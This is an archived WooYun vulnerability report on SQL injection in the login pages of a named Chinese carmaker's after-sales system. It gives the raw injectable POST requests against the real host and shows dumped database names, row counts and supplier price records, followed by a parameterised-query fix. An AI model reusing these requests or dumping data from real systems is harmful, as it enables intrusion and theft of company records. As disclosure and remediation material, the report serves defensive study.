WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-09-18: Details have been sent to the vendor and are awaiting the vendor's handling. 2015-09-23: The vendor has actively ignored the vulnerability; details are disclosed to the public.
As the title says.
The after-sales service system of Dongfeng Shenyu Vehicle Co., Ltd. has SQL injection at both the new and the old system login pages. Injection 1: the new system login page is vulnerable to SQL injection; the yhm parameter is the injectable one.
POST /syfw/login/login_clnew.asp HTTP/1.1
Host: www.dfsyqc.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.dfsyqc.com/syfw/loginnew.html
Cookie: ASPSESSIONIDQCQSTQTC=MJKFGHCBJNIMIILIPHHHELAC; Hm_lvt_a9bd54659f4a895624ba4a669a7ca977=1442501961; Hm_lpvt_a9bd54659f4a895624ba4a669a7ca977=1442502017
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

yhm=a&yhmm=1&btnLogin=%B5%C7%C2%BC
Injection 2: the old system login page is vulnerable to SQL injection; the yhm parameter is the injectable one.
POST /syfw/login/login_cl.asp HTTP/1.1
Host: www.dfsyqc.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.dfsyqc.com/syfw/login.asp
Cookie: ASPSESSIONIDQCQSTQTC=MJKFGHCBJNIMIILIPHHHELAC; Hm_lvt_a9bd54659f4a895624ba4a669a7ca977=1442501961; Hm_lpvt_a9bd54659f4a895624ba4a669a7ca977=1442502226
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

yhm=a&yhmm=1&passcode=1413&Submit=%CC%E1%BD%BB
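Both requests above reach classic ASP login handlers that evidently build the SQL string from the yhm form field. The following is an added example of how such a login lookup is written safely with ADODB command parameters; it is not the vendor's code, and the connection string, table and column names are assumed placeholders.

```asp
<%
' Hardened login lookup for a classic ASP page (added example, not the
' vendor's code). Assumes: strConn holds a valid connection string and
' the table "users" has columns yhm (user name) and yhmm (password).
Option Explicit
Dim yhm, yhmm, conn, cmd, rs
yhm  = Request.Form("yhm")
yhmm = Request.Form("yhmm")

' Vulnerable pattern the report implies (do NOT use): the field value is
' concatenated straight into the statement, so yhm controls the query.
'   sql = "SELECT * FROM users WHERE yhm='" & yhm & "' AND yhmm='" & yhmm & "'"

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open strConn

' Parameterised statement: the driver sends values separately from the
' SQL text, so quotes or keywords in yhm/yhmm can never change the query.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1   ' adCmdText
cmd.CommandText = "SELECT yhm FROM users WHERE yhm = ? AND yhmm = ?"
' CreateParameter(Name, Type, Direction, Size, Value)
' 200 = adVarChar, 1 = adParamInput; Size bounds the accepted length.
cmd.Parameters.Append cmd.CreateParameter("yhm",  200, 1, 50, yhm)
cmd.Parameters.Append cmd.CreateParameter("yhmm", 200, 1, 50, yhmm)

Set rs = cmd.Execute
If Not rs.EOF Then
    Session("user") = rs("yhm")
    Response.Redirect "index.asp"
Else
    ' Same generic message for unknown user and wrong password.
    Response.Write "Login failed."
End If

rs.Close : Set rs = Nothing
conn.Close : Set conn = Nothing
%>
```

The same change applies to the old system's passcode field and to any other form field the handler copies into SQL; comparing a stored password hash instead of the plaintext yhmm is a separate improvement the report does not cover.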
17 databases are involved.
Taking the syass database as an example, it contains 1243 tables (listing truncated):

Database: syass
[1243 tables]
+------------+
| CPKZFJB    |
| EQ1030     |
| GGXH       |
| GGXH_BAK   |
| JZPZK_NEW  |
| KMZD_bj    |
| KMZ_NEW    |
| LJCGQDMC   |
| LS_CK      |
| NJ         |
+------------+
Millions of records exposed (row counts per table, listing truncated):

Database: syass
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| dbo.tbl_vac      | 4326232 |
| dbo.tbl_vac_zzh  | 3837310 |
| dbo.temp_tbl_vac | 3822849 |
| dbo.tbl_hsmxinfc | 3372867 |
| dbo.tbl_vac_null | 1255245 |
| dbo.essjddmx_td1 |  886025 |
| dbo.v_jbxx       |  635772 |
| dbo.essfile      |  589819 |
| dbo.tbl_symxinfc |  292738 |
| dbo.temp_symxin  |  272343 |
| dbo.LJCGQDMC     |  268437 |
| dbo.V_BXGL_DOC   |  206829 |
+------------------+---------+
Car repair really is a lucrative business: the purchase price is 10k, and the paying customer has to fork out over 90k.

Database: syass
Table: v_gys_price
[2 entries]
+------+----------+--------+----------+--------+------------------------------+
| pccc | ghje     | jzyd   | pcfhj    | ycpcdw | gysdwmc                      |
+------+----------+--------+----------+--------+------------------------------+
| 99   | 0.00     | 201510 | 9997.56  | zzxs   | 重庆市嘉卡变速箱有限公司     |
| 85   | 10000.00 | 201201 | 93724.17 | LCHA   | 十堰海奥车桥有限公司-HA      |
+------+----------+--------+----------+--------+------------------------------+
Severity level: No impact (vendor ignored)
Ignored at: 2015-09-23 12:12
Vulnerability Rank: 4 (WooYun rating)
Vendor response: none yet